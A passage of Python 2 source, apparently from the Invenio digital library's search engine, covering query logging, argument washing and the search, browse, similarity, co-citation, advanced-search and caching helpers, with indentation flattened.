id_query = run_sql("INSERT INTO query (type, urlargs) VALUES ('r', %s)", (query_args,))
if id_query:
run_sql("INSERT INTO user_query (id_user, id_query, hostname, date) VALUES (%s, %s, %s, %s)",
(uid, id_query, hostname,
time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())))
return id_query
def log_query_info(action, p, f, colls, nb_records_found_total=-1):
"""Write some info to the log file for later analysis."""
try:
log = open(CFG_LOGDIR + "/search.log", "a")
log.write(time.strftime("%Y%m%d%H%M%S#", time.localtime()))
log.write(action+"#")
log.write(p+"#")
log.write(f+"#")
for coll in colls[:-1]:
log.write("%s," % coll)
log.write("%s#" % colls[-1])
log.write("%d" % nb_records_found_total)
log.write("\n")
log.close()
except:
pass
return
def clean_dictionary(dictionary, list_of_items):
"""Returns a copy of the dictionary with all the items
in the list_of_items as empty strings"""
out_dictionary = dictionary.copy()
out_dictionary.update((item, '') for item in list_of_items)
return out_dictionary
### CALLABLES
def perform_request_search(req=None, cc=CFG_SITE_NAME, c=None, p="", f="", rg=CFG_WEBSEARCH_DEF_RECORDS_IN_GROUPS, sf="", so="d", sp="", rm="", of="id", ot="", aas=0,
p1="", f1="", m1="", op1="", p2="", f2="", m2="", op2="", p3="", f3="", m3="", sc=0, jrec=0,
recid=-1, recidb=-1, sysno="", id=-1, idb=-1, sysnb="", action="", d1="",
d1y=0, d1m=0, d1d=0, d2="", d2y=0, d2m=0, d2d=0, dt="", verbose=0, ap=0, ln=CFG_SITE_LANG, ec=None, tab="",
wl=0, em=""):
"""Perform search or browse request, without checking for
authentication. Return list of recIDs found, if of=id.
Otherwise create web page.
The arguments are as follows:
req - mod_python Request class instance.
cc - current collection (e.g. "ATLAS"). The collection the
user started to search/browse from.
c - collection list (e.g. ["Theses", "Books"]). The
collections user may have selected/deselected when
starting to search from 'cc'.
p - pattern to search for (e.g. "ellis and muon or kaon").
f - field to search within (e.g. "author").
rg - records in groups of (e.g. "10"). Defines how many hits
per collection in the search results page are
displayed. (Note that `rg' is ignored in case of `of=id'.)
sf - sort field (e.g. "title").
so - sort order ("a"=ascending, "d"=descending).
sp - sort pattern (e.g. "CERN-") -- in case there are more
values in a sort field, this argument tells which one
to prefer
rm - ranking method (e.g. "jif"). Defines whether results
should be ranked by some known ranking method.
of - output format (e.g. "hb"). Usually starting "h" means
HTML output (and "hb" for HTML brief, "hd" for HTML
detailed), "x" means XML output, "t" means plain text
output, "id" means no output at all but to return list
of recIDs found, "intbitset" means to return an intbitset
representation of the recIDs found (no sorting or ranking
will be performed). (Suitable for high-level API.)
ot - output only these MARC tags (e.g. "100,700,909C0b").
Useful if only some fields are to be shown in the
output, e.g. for library to control some fields.
em - output only part of the page.
aas - advanced search ("0" means no, "1" means yes). Whether
search was called from within the advanced search
interface.
p1 - first pattern to search for in the advanced search
interface. Much like 'p'.
f1 - first field to search within in the advanced search
interface. Much like 'f'.
m1 - first matching type in the advanced search interface.
("a" all of the words, "o" any of the words, "e" exact
phrase, "p" partial phrase, "r" regular expression).
op1 - first operator, to join the first and the second unit
in the advanced search interface. ("a" add, "o" or,
"n" not).
p2 - second pattern to search for in the advanced search
interface. Much like 'p'.
f2 - second field to search within in the advanced search
interface. Much like 'f'.
m2 - second matching type in the advanced search interface.
("a" all of the words, "o" any of the words, "e" exact
phrase, "p" partial phrase, "r" regular expression).
op2 - second operator, to join the second and the third unit
in the advanced search interface. ("a" add, "o" or,
"n" not).
p3 - third pattern to search for in the advanced search
interface. Much like 'p'.
f3 - third field to search within in the advanced search
interface. Much like 'f'.
m3 - third matching type in the advanced search interface.
("a" all of the words, "o" any of the words, "e" exact
phrase, "p" partial phrase, "r" regular expression).
sc - split by collection ("0" no, "1" yes). Governs whether
we want to present the results in a single huge list,
or splitted by collection.
jrec - jump to record (e.g. "234"). Used for navigation
inside the search results. (Note that `jrec' is ignored
in case of `of=id'.)
recid - display record ID (e.g. "20000"). Do not
search/browse but go straight away to the Detailed
record page for the given recID.
recidb - display record ID bis (e.g. "20010"). If greater than
'recid', then display records from recid to recidb.
Useful for example for dumping records from the
database for reformatting.
sysno - display old system SYS number (e.g. ""). If you
migrate to Invenio from another system, and store your
old SYS call numbers, you can use them instead of recid
if you wish so.
id - the same as recid, in case recid is not set. For
backwards compatibility.
idb - the same as recid, in case recidb is not set. For
backwards compatibility.
sysnb - the same as sysno, in case sysno is not set. For
backwards compatibility.
action - action to do. "SEARCH" for searching, "Browse" for
browsing. Default is to search.
d1 - first datetime in full YYYY-mm-dd HH:MM:DD format
(e.g. "1998-08-23 12:34:56"). Useful for search limits
on creation/modification date (see 'dt' argument
below). Note that 'd1' takes precedence over d1y, d1m,
d1d if these are defined.
d1y - first date's year (e.g. "1998"). Useful for search
limits on creation/modification date.
d1m - first date's month (e.g. "08"). Useful for search
limits on creation/modification date.
d1d - first date's day (e.g. "23"). Useful for search
limits on creation/modification date.
d2 - second datetime in full YYYY-mm-dd HH:MM:DD format
(e.g. "1998-09-02 12:34:56"). Useful for search limits
on creation/modification date (see 'dt' argument
below). Note that 'd2' takes precedence over d2y, d2m,
d2d if these are defined.
d2y - second date's year (e.g. "1998"). Useful for search
limits on creation/modification date.
d2m - second date's month (e.g. "09"). Useful for search
limits on creation/modification date.
d2d - second date's day (e.g. "02"). Useful for search
limits on creation/modification date.
dt - first and second date's type (e.g. "c"). Specifies
whether to search in creation dates ("c") or in
modification dates ("m"). When dt is not set and d1*
and d2* are set, the default is "c".
verbose - verbose level (0=min, 9=max). Useful to print some
internal information on the searching process in case
something goes wrong.
ap - alternative patterns (0=no, 1=yes). In case no exact
match is found, the search engine can try alternative
patterns e.g. to replace non-alphanumeric characters by
a boolean query. ap defines if this is wanted.
ln - language of the search interface (e.g. "en"). Useful
for internationalization.
ec - list of external search engines to search as well
(e.g. "SPIRES HEP").
wl - wildcard limit (ex: 100) the wildcard queries will be
limited at 100 results
"""
kwargs = prs_wash_arguments(req=req, cc=cc, c=c, p=p, f=f, rg=rg, sf=sf, so=so, sp=sp, rm=rm, of=of, ot=ot, aas=aas,
p1=p1, f1=f1, m1=m1, op1=op1, p2=p2, f2=f2, m2=m2, op2=op2, p3=p3, f3=f3, m3=m3, sc=sc, jrec=jrec,
recid=recid, recidb=recidb, sysno=sysno, id=id, idb=idb, sysnb=sysnb, action=action, d1=d1,
d1y=d1y, d1m=d1m, d1d=d1d, d2=d2, d2y=d2y, d2m=d2m, d2d=d2d, dt=dt, verbose=verbose, ap=ap, ln=ln, ec=ec,
tab=tab, wl=wl, em=em)
return prs_perform_search(kwargs=kwargs, **kwargs)
def prs_perform_search(kwargs=None, **dummy):
"""Internal call which does the search, it is calling standard Invenio;
Unless you know what you are doing, don't use this call as an API
"""
# separately because we can call it independently
out = prs_wash_arguments_colls(kwargs=kwargs, **kwargs)
if not out:
return out
return prs_search(kwargs=kwargs, **kwargs)
def prs_wash_arguments_colls(kwargs=None, of=None, req=None, cc=None, c=None, sc=None, verbose=None,
aas=None, ln=None, em="", **dummy):
"""
Check and wash collection list argument before we start searching.
If there are troubles, e.g. a collection is not defined, print
warning to the browser.
@return: True if collection list is OK, and various False values
(empty string, empty list) if there was an error.
"""
# raise an exception when trying to print out html from the cli
if of.startswith("h"):
assert req
# for every search engine request asking for an HTML output, we
# first regenerate cache of collection and field I18N names if
# needed; so that later we won't bother checking timestamps for
# I18N names at all:
if of.startswith("h"):
collection_i18nname_cache.recreate_cache_if_needed()
field_i18nname_cache.recreate_cache_if_needed()
try:
(cc, colls_to_display, colls_to_search, hosted_colls, wash_colls_debug) = wash_colls(cc, c, sc, verbose) # which colls to search and to display?
kwargs['colls_to_display'] = colls_to_display
kwargs['colls_to_search'] = colls_to_search
kwargs['hosted_colls'] = hosted_colls
kwargs['wash_colls_debug'] = wash_colls_debug
except InvenioWebSearchUnknownCollectionError, exc:
colname = exc.colname
if of.startswith("h"):
page_start(req, of, cc, aas, ln, getUid(req),
websearch_templates.tmpl_collection_not_found_page_title(colname, ln))
req.write(websearch_templates.tmpl_collection_not_found_page_body(colname, ln))
page_end(req, of, ln, em)
return ''
elif of == "id":
return []
elif of == "intbitset":
return intbitset()
elif of.startswith("x"):
# Print empty, but valid XML
print_records_prologue(req, of)
print_records_epilogue(req, of)
page_end(req, of, ln, em)
return ''
else:
page_end(req, of, ln, em)
return ''
return True
def prs_wash_arguments(req=None, cc=CFG_SITE_NAME, c=None, p="", f="", rg=CFG_WEBSEARCH_DEF_RECORDS_IN_GROUPS,
sf="", so="d", sp="", rm="", of="id", ot="", aas=0,
p1="", f1="", m1="", op1="", p2="", f2="", m2="", op2="", p3="", f3="", m3="",
sc=0, jrec=0, recid=-1, recidb=-1, sysno="", id=-1, idb=-1, sysnb="", action="", d1="",
d1y=0, d1m=0, d1d=0, d2="", d2y=0, d2m=0, d2d=0, dt="", verbose=0, ap=0, ln=CFG_SITE_LANG,
ec=None, tab="", uid=None, wl=0, em="", **dummy):
"""
Sets the (default) values and checks others for the PRS call
"""
# wash output format:
of = wash_output_format(of)
# wash all arguments requiring special care
p = wash_pattern(p)
f = wash_field(f)
p1 = wash_pattern(p1)
f1 = wash_field(f1)
p2 = wash_pattern(p2)
f2 = wash_field(f2)
p3 = wash_pattern(p3)
f3 = wash_field(f3)
(d1y, d1m, d1d, d2y, d2m, d2d) = map(int, (d1y, d1m, d1d, d2y, d2m, d2d))
datetext1, datetext2 = wash_dates(d1, d1y, d1m, d1d, d2, d2y, d2m, d2d)
# wash ranking method:
if not is_method_valid(None, rm):
rm = ""
# backwards compatibility: id, idb, sysnb -> recid, recidb, sysno (if applicable)
if sysnb != "" and sysno == "":
sysno = sysnb
if id > 0 and recid == -1:
recid = id
if idb > 0 and recidb == -1:
recidb = idb
# TODO deduce passed search limiting criterias (if applicable)
pl, pl_in_url = "", "" # no limits by default
if action != "browse" and req and not isinstance(req, cStringIO.OutputType) \
and req.args and not isinstance(req.args, dict): # we do not want to add options while browsing or while calling via command-line
fieldargs = cgi.parse_qs(req.args)
for fieldcode in get_fieldcodes():
if fieldargs.has_key(fieldcode):
for val in fieldargs[fieldcode]:
pl += "+%s:\"%s\" " % (fieldcode, val)
pl_in_url += "&%s=%s" % (urllib.quote(fieldcode), urllib.quote(val))
# deduce recid from sysno argument (if applicable):
if sysno: # ALEPH SYS number was passed, so deduce DB recID for the record:
recid = get_mysql_recid_from_aleph_sysno(sysno)
if recid is None:
recid = 0 # use recid 0 to indicate that this sysno does not exist
# deduce collection we are in (if applicable):
if recid > 0:
referer = None
if req:
referer = req.headers_in.get('Referer')
cc = guess_collection_of_a_record(recid, referer)
# deduce user id (if applicable):
if uid is None:
try:
uid = getUid(req)
except:
uid = 0
_ = gettext_set_language(ln)
kwargs = {'req':req,'cc':cc, 'c':c, 'p':p, 'f':f, 'rg':rg, 'sf':sf, 'so':so, 'sp':sp, 'rm':rm, 'of':of, 'ot':ot, 'aas':aas,
'p1':p1, 'f1':f1, 'm1':m1, 'op1':op1, 'p2':p2, 'f2':f2, 'm2':m2, 'op2':op2, 'p3':p3, 'f3':f3, 'm3':m3, 'sc':sc, 'jrec':jrec,
'recid':recid, 'recidb':recidb, 'sysno':sysno, 'id':id, 'idb':idb, 'sysnb':sysnb, 'action':action, 'd1':d1,
'd1y':d1y, 'd1m':d1m, 'd1d':d1d, 'd2':d2, 'd2y':d2y, 'd2m':d2m, 'd2d':d2d, 'dt':dt, 'verbose':verbose, 'ap':ap, 'ln':ln, 'ec':ec,
'tab':tab, 'wl':wl, 'em': em,
'datetext1': datetext1, 'datetext2': datetext2, 'uid': uid, 'cc':cc, 'pl': pl, 'pl_in_url': pl_in_url, '_': _,
'selected_external_collections_infos':None,
}
kwargs.update(**dummy)
return kwargs
def prs_search(kwargs=None, recid=0, req=None, cc=None, p=None, p1=None, p2=None, p3=None,
f=None, ec=None, verbose=None, ln=None, selected_external_collections_infos=None,
action=None,rm=None, of=None, em=None,
**dummy):
"""
This function write various bits into the req object as the search
proceeds (so that pieces of a page are rendered even before the
search ended)
"""
## 0 - start output
if recid >= 0: # recid can be 0 if deduced from sysno and if such sysno does not exist
output = prs_detailed_record(kwargs=kwargs, **kwargs)
if output is not None:
return output
elif action == "browse":
## 2 - browse needed
of = 'hb'
output = prs_browse(kwargs=kwargs, **kwargs)
if output is not None:
return output
elif rm and p.startswith("recid:"):
## 3-ter - similarity search (or old-style citation search) needed
output = prs_search_similar_records(kwargs=kwargs, **kwargs)
if output is not None:
return output
elif p.startswith("cocitedwith:"): #WAS EXPERIMENTAL
## 3-terter - cited by search needed
output = prs_search_cocitedwith(kwargs=kwargs, **kwargs)
if output is not None:
return output
else:
## 3 - common search needed
output = prs_search_common(kwargs=kwargs, **kwargs)
if output is not None:
return output
# External searches
if of.startswith("h"):
if not of in ['hcs', 'hcs2']:
perform_external_collection_search_with_em(req, cc, [p, p1, p2, p3], f, ec, verbose,
ln, selected_external_collections_infos, em=em)
return page_end(req, of, ln, em)
def prs_detailed_record(kwargs=None, req=None, of=None, cc=None, aas=None, ln=None, uid=None, recid=None, recidb=None,
p=None, verbose=None, tab=None, sf=None, so=None, sp=None, rm=None, ot=None, _=None, em=None,
**dummy):
"""Formats and prints one record"""
## 1 - detailed record display
title, description, keywords = \
websearch_templates.tmpl_record_page_header_content(req, recid, ln)
if req is not None and req.method != 'HEAD':
page_start(req, of, cc, aas, ln, uid, title, description, keywords, recid, tab, em)
# Default format is hb but we are in detailed -> change 'of'
if of == "hb":
of = "hd"
if record_exists(recid):
if recidb <= recid: # sanity check
recidb = recid + 1
if of in ["id", "intbitset"]:
result = [recidx for recidx in range(recid, recidb) if record_exists(recidx)]
if of == "intbitset":
return intbitset(result)
else:
return result
else:
print_records(req, range(recid, recidb), -1, -9999, of, ot, ln, search_pattern=p, verbose=verbose,
tab=tab, sf=sf, so=so, sp=sp, rm=rm, em=em)
if req and of.startswith("h"): # register detailed record page view event
client_ip_address = str(req.remote_ip)
register_page_view_event(recid, uid, client_ip_address)
else: # record does not exist
if of == "id":
return []
elif of == "intbitset":
return intbitset()
elif of.startswith("x"):
# Print empty, but valid XML
print_records_prologue(req, of)
print_records_epilogue(req, of)
elif of.startswith("h"):
if req.method == 'HEAD':
raise apache.SERVER_RETURN, apache.HTTP_NOT_FOUND
else:
write_warning(_("Requested record does not seem to exist."), req=req)
def prs_browse(kwargs=None, req=None, of=None, cc=None, aas=None, ln=None, uid=None, _=None, p=None,
p1=None, p2=None, p3=None, colls_to_display=None, f=None, rg=None, sf=None,
so=None, sp=None, rm=None, ot=None, f1=None, m1=None, op1=None,
f2=None, m2=None, op2=None, f3=None, m3=None, sc=None, pl=None,
d1y=None, d1m=None, d1d=None, d2y=None, d2m=None, d2d=None,
dt=None, jrec=None, ec=None, action=None,
colls_to_search=None, verbose=None, em=None, **dummy):
page_start(req, of, cc, aas, ln, uid, _("Browse"), p=create_page_title_search_pattern_info(p, p1, p2, p3), em=em)
req.write(create_search_box(cc, colls_to_display, p, f, rg, sf, so, sp, rm, of, ot, aas, ln, p1, f1, m1, op1,
p2, f2, m2, op2, p3, f3, m3, sc, pl, d1y, d1m, d1d, d2y, d2m, d2d, dt, jrec, ec, action,
em
))
write_warning(create_exact_author_browse_help_link(p, p1, p2, p3, f, f1, f2, f3,
rm, cc, ln, jrec, rg, aas, action),
req=req)
try:
if aas == 1 or (p1 or p2 or p3):
browse_pattern(req, colls_to_search, p1, f1, rg, ln)
browse_pattern(req, colls_to_search, p2, f2, rg, ln)
browse_pattern(req, colls_to_search, p3, f3, rg, ln)
else:
browse_pattern(req, colls_to_search, p, f, rg, ln)
except:
register_exception(req=req, alert_admin=True)
if of.startswith("h"):
req.write(create_error_box(req, verbose=verbose, ln=ln))
elif of.startswith("x"):
# Print empty, but valid XML
print_records_prologue(req, of)
print_records_epilogue(req, of)
return page_end(req, of, ln, em)
def prs_search_similar_records(kwargs=None, req=None, of=None, cc=None, pl_in_url=None, ln=None, uid=None, _=None, p=None,
p1=None, p2=None, p3=None, colls_to_display=None, f=None, rg=None, sf=None,
so=None, sp=None, rm=None, ot=None, aas=None, f1=None, m1=None, op1=None,
f2=None, m2=None, op2=None, f3=None, m3=None, sc=None, pl=None,
d1y=None, d1m=None, d1d=None, d2y=None, d2m=None, d2d=None,
dt=None, jrec=None, ec=None, action=None, em=None,
verbose=None, **dummy):
if req and req.method != 'HEAD':
page_start(req, of, cc, aas, ln, uid, _("Search Results"), p=create_page_title_search_pattern_info(p, p1, p2, p3),
em=em)
if of.startswith("h"):
req.write(create_search_box(cc, colls_to_display, p, f, rg, sf, so, sp, rm, of, ot, aas, ln, p1, f1, m1, op1,
p2, f2, m2, op2, p3, f3, m3, sc, pl, d1y, d1m, d1d, d2y, d2m, d2d, dt, jrec, ec, action,
em
))
if record_exists(p[6:]) != 1:
# record does not exist
if of.startswith("h"):
if req.method == 'HEAD':
raise apache.SERVER_RETURN, apache.HTTP_NOT_FOUND
else:
write_warning(_("Requested record does not seem to exist."), req=req)
if of == "id":
return []
if of == "intbitset":
return intbitset()
elif of.startswith("x"):
# Print empty, but valid XML
print_records_prologue(req, of)
print_records_epilogue(req, of)
else:
# record well exists, so find similar ones to it
t1 = os.times()[4]
results_similar_recIDs, results_similar_relevances, results_similar_relevances_prologue, results_similar_relevances_epilogue, results_similar_comments = \
rank_records_bibrank(rm, 0, get_collection_reclist(cc), string.split(p), verbose, f, rg, jrec)
if results_similar_recIDs:
t2 = os.times()[4]
cpu_time = t2 - t1
if of.startswith("h"):
req.write(print_search_info(p, f, sf, so, sp, rm, of, ot, cc, len(results_similar_recIDs),
jrec, rg, aas, ln, p1, p2, p3, f1, f2, f3, m1, m2, m3, op1, op2,
sc, pl_in_url,
d1y, d1m, d1d, d2y, d2m, d2d, dt, cpu_time, em=em))
write_warning(results_similar_comments, req=req)
print_records(req, results_similar_recIDs, jrec, rg, of, ot, ln,
results_similar_relevances, results_similar_relevances_prologue,
results_similar_relevances_epilogue,
search_pattern=p, verbose=verbose, sf=sf, so=so, sp=sp, rm=rm, em=em)
elif of == "id":
return results_similar_recIDs
elif of == "intbitset":
return intbitset(results_similar_recIDs)
elif of.startswith("x"):
print_records(req, results_similar_recIDs, jrec, rg, of, ot, ln,
results_similar_relevances, results_similar_relevances_prologue,
results_similar_relevances_epilogue, search_pattern=p, verbose=verbose,
sf=sf, so=so, sp=sp, rm=rm, em=em)
else:
# rank_records failed and returned some error message to display:
if of.startswith("h"):
write_warning(results_similar_relevances_prologue, req=req)
write_warning(results_similar_relevances_epilogue, req=req)
write_warning(results_similar_comments, req=req)
if of == "id":
return []
elif of == "intbitset":
return intbitset()
elif of.startswith("x"):
# Print empty, but valid XML
print_records_prologue(req, of)
print_records_epilogue(req, of)
def prs_search_cocitedwith(kwargs=None, req=None, of=None, cc=None, pl_in_url=None, ln=None, uid=None, _=None, p=None,
p1=None, p2=None, p3=None, colls_to_display=None, f=None, rg=None, sf=None,
so=None, sp=None, rm=None, ot=None, aas=None, f1=None, m1=None, op1=None,
f2=None, m2=None, op2=None, f3=None, m3=None, sc=None, pl=None,
d1y=None, d1m=None, d1d=None, d2y=None, d2m=None, d2d=None,
dt=None, jrec=None, ec=None, action=None,
verbose=None, em=None, **dummy):
page_start(req, of, cc, aas, ln, uid, _("Search Results"), p=create_page_title_search_pattern_info(p, p1, p2, p3),
em=em)
if of.startswith("h"):
req.write(create_search_box(cc, colls_to_display, p, f, rg, sf, so, sp, rm, of, ot, aas, ln, p1, f1, m1, op1,
p2, f2, m2, op2, p3, f3, m3, sc, pl, d1y, d1m, d1d, d2y, d2m, d2d, dt, jrec, ec, action,
em
))
recID = p[12:]
if record_exists(recID) != 1:
# record does not exist
if of.startswith("h"):
write_warning(_("Requested record does not seem to exist."), req=req)
if of == "id":
return []
elif of == "intbitset":
return intbitset()
elif of.startswith("x"):
# Print empty, but valid XML
print_records_prologue(req, of)
print_records_epilogue(req, of)
else:
# record well exists, so find co-cited ones:
t1 = os.times()[4]
results_cocited_recIDs = map(lambda x: x[0], calculate_co_cited_with_list(int(recID)))
if results_cocited_recIDs:
t2 = os.times()[4]
cpu_time = t2 - t1
if of.startswith("h"):
req.write(print_search_info(p, f, sf, so, sp, rm, of, ot, CFG_SITE_NAME, len(results_cocited_recIDs),
jrec, rg, aas, ln, p1, p2, p3, f1, f2, f3, m1, m2, m3, op1, op2,
sc, pl_in_url,
d1y, d1m, d1d, d2y, d2m, d2d, dt, cpu_time, em=em))
print_records(req, results_cocited_recIDs, jrec, rg, of, ot, ln, search_pattern=p, verbose=verbose,
sf=sf, so=so, sp=sp, rm=rm, em=em)
elif of == "id":
return results_cocited_recIDs
elif of == "intbitset":
return intbitset(results_cocited_recIDs)
elif of.startswith("x"):
print_records(req, results_cocited_recIDs, jrec, rg, of, ot, ln, search_pattern=p, verbose=verbose,
sf=sf, so=so, sp=sp, rm=rm, em=em)
else:
# cited rank_records failed and returned some error message to display:
if of.startswith("h"):
write_warning("nothing found", req=req)
if of == "id":
return []
elif of == "intbitset":
return intbitset()
elif of.startswith("x"):
# Print empty, but valid XML
print_records_prologue(req, of)
print_records_epilogue(req, of)
def prs_search_hosted_collections(kwargs=None, req=None, of=None, ln=None, _=None, p=None,
p1=None, p2=None, p3=None, hosted_colls=None, f=None,
colls_to_search=None, hosted_colls_actual_or_potential_results_p=None,
verbose=None, **dummy):
hosted_colls_results = hosted_colls_timeouts = hosted_colls_true_results = None
# search into the hosted collections only if the output format is html or xml
if hosted_colls and (of.startswith("h") or of.startswith("x")) and not p.startswith("recid:"):
# hosted_colls_results : the hosted collections' searches that did not timeout
# hosted_colls_timeouts : the hosted collections' searches that timed out and will be searched later on again
(hosted_colls_results, hosted_colls_timeouts) = calculate_hosted_collections_results(req, [p, p1, p2, p3], f, hosted_colls, verbose, ln, CFG_HOSTED_COLLECTION_TIMEOUT_ANTE_SEARCH)
# successful searches
if hosted_colls_results:
hosted_colls_true_results = []
for result in hosted_colls_results:
# if the number of results is None or 0 (or False) then just do nothing
if result[1] == None or result[1] == False:
# these are the searches the returned no or zero results
if verbose:
write_warning("Hosted collections (perform_search_request): %s returned no results" % result[0][1].name, req=req)
else:
# these are the searches that actually returned results on time
hosted_colls_true_results.append(result)
if verbose:
write_warning("Hosted collections (perform_search_request): %s returned %s results in %s seconds" % (result[0][1].name, result[1], result[2]), req=req)
else:
if verbose:
write_warning("Hosted collections (perform_search_request): there were no hosted collections results to be printed at this time", req=req)
if hosted_colls_timeouts:
if verbose:
for timeout in hosted_colls_timeouts:
write_warning("Hosted collections (perform_search_request): %s timed out and will be searched again later" % timeout[0][1].name, req=req)
# we need to know for later use if there were any hosted collections to be searched even if they weren't in the end
elif hosted_colls and ((not (of.startswith("h") or of.startswith("x"))) or p.startswith("recid:")):
(hosted_colls_results, hosted_colls_timeouts) = (None, None)
else:
if verbose:
write_warning("Hosted collections (perform_search_request): there were no hosted collections to be searched", req=req)
## let's define some useful boolean variables:
# True means there are actual or potential hosted collections results to be printed
kwargs['hosted_colls_actual_or_potential_results_p'] = not (not hosted_colls or not ((hosted_colls_results and hosted_colls_true_results) or hosted_colls_timeouts))
# True means there are hosted collections timeouts to take care of later
# (useful for more accurate printing of results later)
kwargs['hosted_colls_potential_results_p'] = not (not hosted_colls or not hosted_colls_timeouts)
# True means we only have hosted collections to deal with
kwargs['only_hosted_colls_actual_or_potential_results_p'] = not colls_to_search and hosted_colls_actual_or_potential_results_p
kwargs['hosted_colls_results'] = hosted_colls_results
kwargs['hosted_colls_timeouts'] = hosted_colls_timeouts
kwargs['hosted_colls_true_results'] = hosted_colls_true_results
def prs_advanced_search(results_in_any_collection, kwargs=None, req=None, of=None,
cc=None, ln=None, _=None, p=None, p1=None, p2=None, p3=None,
f=None, f1=None, m1=None, op1=None, f2=None, m2=None,
op2=None, f3=None, m3=None, ap=None, ec=None,
selected_external_collections_infos=None, verbose=None,
wl=None, em=None, **dummy):
len_results_p1 = 0
len_results_p2 = 0
len_results_p3 = 0
try:
results_in_any_collection.union_update(search_pattern_parenthesised(req, p1, f1, m1, ap=ap, of=of, verbose=verbose, ln=ln, wl=wl))
len_results_p1 = len(results_in_any_collection)
if len_results_p1 == 0:
if of.startswith("h"):
perform_external_collection_search_with_em(req, cc, [p, p1, p2, p3], f, ec,
verbose, ln, selected_external_collections_infos, em=em)
elif of.startswith("x"):
# Print empty, but valid XML
print_records_prologue(req, of)
print_records_epilogue(req, of)
return page_end(req, of, ln, em)
if p2:
results_tmp = search_pattern_parenthesised(req, p2, f2, m2, ap=ap, of=of, verbose=verbose, ln=ln, wl=wl)
len_results_p2 = len(results_tmp)
if op1 == "a": # add
results_in_any_collection.intersection_update(results_tmp)
elif op1 == "o": # or
results_in_any_collection.union_update(results_tmp)
elif op1 == "n": # not
results_in_any_collection.difference_update(results_tmp)
else:
if of.startswith("h"):
write_warning("Invalid set operation %s." % cgi.escape(op1), "Error", req=req)
if len(results_in_any_collection) == 0:
if of.startswith("h"):
if len_results_p2:
#each individual query returned results, but the boolean operation did not
nearestterms = []
nearest_search_args = req.argd.copy()
if p1:
nearestterms.append((p1, len_results_p1, clean_dictionary(nearest_search_args, ['p2', 'f2', 'm2', 'p3', 'f3', 'm3'])))
nearestterms.append((p2, len_results_p2, clean_dictionary(nearest_search_args, ['p1', 'f1', 'm1', 'p3', 'f3', 'm3'])))
write_warning(websearch_templates.tmpl_search_no_boolean_hits(ln=ln, nearestterms=nearestterms), req=req)
perform_external_collection_search_with_em(req, cc, [p, p1, p2, p3], f, ec, verbose,
ln, selected_external_collections_infos, em=em)
elif of.startswith("x"):
# Print empty, but valid XML
print_records_prologue(req, of)
print_records_epilogue(req, of)
if p3:
results_tmp = search_pattern_parenthesised(req, p3, f3, m3, ap=ap, of=of, verbose=verbose, ln=ln, wl=wl)
len_results_p3 = len(results_tmp)
if op2 == "a": # add
results_in_any_collection.intersection_update(results_tmp)
elif op2 == "o": # or
results_in_any_collection.union_update(results_tmp)
elif op2 == "n": # not
results_in_any_collection.difference_update(results_tmp)
else:
if of.startswith("h"):
write_warning("Invalid set operation %s." % cgi.escape(op2), "Error", req=req)
if len(results_in_any_collection) == 0 and len_results_p3 and of.startswith("h"):
#each individual query returned results but the boolean operation did not
nearestterms = []
nearest_search_args = req.argd.copy()
if p1:
nearestterms.append((p1, len_results_p1, clean_dictionary(nearest_search_args, ['p2', 'f2', 'm2', 'p3', 'f3', 'm3'])))
if p2:
nearestterms.append((p2, len_results_p2, clean_dictionary(nearest_search_args, ['p1', 'f1', 'm1', 'p3', 'f3', 'm3'])))
nearestterms.append((p3, len_results_p3, clean_dictionary(nearest_search_args, ['p1', 'f1', 'm1', 'p2', 'f2', 'm2'])))
write_warning(websearch_templates.tmpl_search_no_boolean_hits(ln=ln, nearestterms=nearestterms), req=req)
except:
register_exception(req=req, alert_admin=True)
if of.startswith("h"):
req.write(create_error_box(req, verbose=verbose, ln=ln))
perform_external_collection_search_with_em(req, cc, [p, p1, p2, p3], f, ec, verbose,
ln, selected_external_collections_infos, em=em)
elif of.startswith("x"):
# Print empty, but valid XML
print_records_prologue(req, of)
print_records_epilogue(req, of)
return page_end(req, of, ln, em)
def prs_simple_search(results_in_any_collection, kwargs=None, req=None, of=None, cc=None, ln=None, p=None, f=None,
p1=None, p2=None, p3=None, ec=None, verbose=None, selected_external_collections_infos=None,
only_hosted_colls_actual_or_potential_results_p=None, query_representation_in_cache=None,
ap=None, hosted_colls_actual_or_potential_results_p=None, wl=None, em=None,
**dummy):
try:
results_in_cache = intbitset().fastload(
search_results_cache.get(query_representation_in_cache))
except:
results_in_cache = None
if results_in_cache is not None:
# query is not in the cache already, so reuse it:
results_in_any_collection.union_update(results_in_cache)
if verbose and of.startswith("h"):
write_warning("Search stage 0: query found in cache, reusing cached results.", req=req)
else:
try:
# added the display_nearest_terms_box parameter to avoid printing out the "Nearest terms in any collection"
# recommendations when there are results only in the hosted collections. Also added the if clause to avoid
# searching in case we know we only have actual or potential hosted collections results
if not only_hosted_colls_actual_or_potential_results_p:
results_in_any_collection.union_update(search_pattern_parenthesised(req, p, f, ap=ap, of=of, verbose=verbose, ln=ln,
display_nearest_terms_box=not hosted_colls_actual_or_potential_results_p,
wl=wl))
except:
register_exception(req=req, alert_admin=True)
if of.startswith("h"):
req.write(create_error_box(req, verbose=verbose, ln=ln))
perform_external_collection_search_with_em(req, cc, [p, p1, p2, p3], f, ec, verbose,
ln, selected_external_collections_infos, em=em)
return page_end(req, of, ln, em)
def prs_intersect_results_with_collrecs(results_final, results_in_any_collection, kwargs=None, colls_to_search=None,
req=None, ap=None, of=None, ln=None,
cc=None, p=None, p1=None, p2=None, p3=None, f=None,
ec=None, verbose=None, selected_external_collections_infos=None, em=None,
**dummy):
display_nearest_terms_box=not kwargs['hosted_colls_actual_or_potential_results_p']
try:
# added the display_nearest_terms_box parameter to avoid printing out the "Nearest terms in any collection"
# recommendations when there results only in the hosted collections. Also added the if clause to avoid
# searching in case we know since the last stage that we have no results in any collection
if len(results_in_any_collection) != 0:
results_final.update(intersect_results_with_collrecs(req, results_in_any_collection, colls_to_search, ap, of,
verbose, ln, display_nearest_terms_box=display_nearest_terms_box))
except:
register_exception(req=req, alert_admin=True)
if of.startswith("h"):
req.write(create_error_box(req, verbose=verbose, ln=ln))
perform_external_collection_search_with_em(req, cc, [p, p1, p2, p3], f, ec, verbose,
ln, selected_external_collections_infos, em=em)
return page_end(req, of, ln, em)
def prs_store_results_in_cache(query_representation_in_cache, results_in_any_collection, req=None, verbose=None, of=None, **dummy):
if CFG_WEBSEARCH_SEARCH_CACHE_SIZE > 0:
search_results_cache.set(query_representation_in_cache,
results_in_any_collection.fastdump(),
timeout=CFG_WEBSEARCH_SEARCH_CACHE_TIMEOUT)
